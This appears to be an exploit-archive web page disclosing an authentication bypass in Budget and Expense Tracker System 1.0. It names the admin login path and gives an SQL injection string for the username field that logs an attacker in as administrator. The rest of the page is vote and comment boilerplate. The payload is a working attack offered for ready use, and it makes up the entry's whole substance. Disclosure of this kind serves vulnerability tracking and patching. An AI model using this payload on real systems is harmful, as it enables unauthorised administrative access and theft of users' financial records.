Budget and Expense Tracker System 1.0 Authenticated Bypass

2021.09.20

Credit: Prunier Charles-Yves

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Exploit Title: Budget and Expense Tracker System 1.0 - Authenticated Bypass
# Exploit Author: Prunier Charles-Yves
# Date: September 20, 2021
# Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/expense_budget.zip
# Tested on: Linux, windows
# Vendor: oretnom23
# Version: v1.0
# Exploit Description:
Budget and Expense Tracker System 1.0, is prone to an Easy authentication bypass vulnerability on the application
allowing the attacker to login with admin acount
----- PoC: Authentication Bypass -----
Administration Panel: http://localhost/expense_budget/admin/login.php
Username: admin' or ''=' --

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Budget and Expense Tracker System 1.0 Authenticated Bypass

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.